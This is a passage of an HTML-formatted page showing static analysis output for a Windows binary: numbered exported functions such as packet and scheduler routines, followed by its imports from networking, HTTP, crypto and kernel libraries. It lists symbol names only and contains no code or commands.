packet_add_tlv_uint</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>50) packet_add_tlv_wstring</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>51) packet_add_tlv_wstring_len</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>52) packet_add_tlvs</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>53) packet_call_completion_handlers</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>54) packet_create</span></p><p class="p1" style="background-color: rgba(0, 
0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>55) packet_create_group</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>56) packet_create_response</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>57) packet_destroy</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>58) packet_enum_tlv</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>59) packet_get_tlv</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; 
font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>60) packet_get_tlv_group_entry</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>61) packet_get_tlv_meta</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>62) packet_get_tlv_string</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>63) packet_get_tlv_value_bool</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>64) packet_get_tlv_value_qword</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; 
line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>65) packet_get_tlv_value_raw</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>66) packet_get_tlv_value_string</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>67) packet_get_tlv_value_uint</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>68) packet_get_tlv_value_wstring</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>69) packet_get_type</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" 
style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>70) packet_is_tlv_null_terminated</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>71) packet_remove_completion_handler</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>72) packet_transmit_empty_response</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>73) packet_transmit_response</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>74) scheduler_destroy</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: 
no-common-ligatures;"><span class="Apple-converted-space"> </span>75) scheduler_initialize</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>76) scheduler_insert_waitable</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>77) scheduler_signal_waitable</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>78) scheduler_waitable_thread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">imports:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.ntohl</span></p><p class="p1" 
style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.connect</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.htonl</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.htons</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.inet_addr</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.inet_ntoa</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; 
font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.listen</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.send</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.WSADuplicateSocketA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.WSAGetLastError</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.WSASetLastError</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: 
normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.WSAStartup</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.getservbyname</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.getservbyport</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.gethostbyname</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.gethostbyaddr</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" 
style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.socket</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.setsockopt</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.select</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.recv</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.ntohs</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- 
WS2_32.dll.shutdown</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.closesocket</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.bind</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.accept</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- CRYPT32.dll.CertGetCertificateContextProperty</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 
10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WININET.dll.HttpQueryInfoW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WININET.dll.InternetOpenW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WININET.dll.InternetCloseHandle</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WININET.dll.InternetConnectW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WININET.dll.InternetReadFile</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: 
normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WININET.dll.InternetSetOptionW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WININET.dll.HttpOpenRequestW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WININET.dll.HttpSendRequestW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WININET.dll.InternetCrackUrlW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpOpenRequest</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; 
line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpReadData</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpConnect</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpCloseHandle</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpCrackUrl</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpSetOption</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" 
style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpQueryOption</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpOpen</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpGetIEProxyConfigForCurrentUser</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpGetProxyForUrl</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpQueryHeaders</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" 
style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpReceiveResponse</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpSendRequest</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.CompareStringW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetStringTypeW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.CreateFileW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: 
no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.LoadLibraryExW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.OutputDebugStringW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.FileTimeToSystemTime</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SystemTimeToTzSpecificLocalTime</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetDriveTypeW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span 
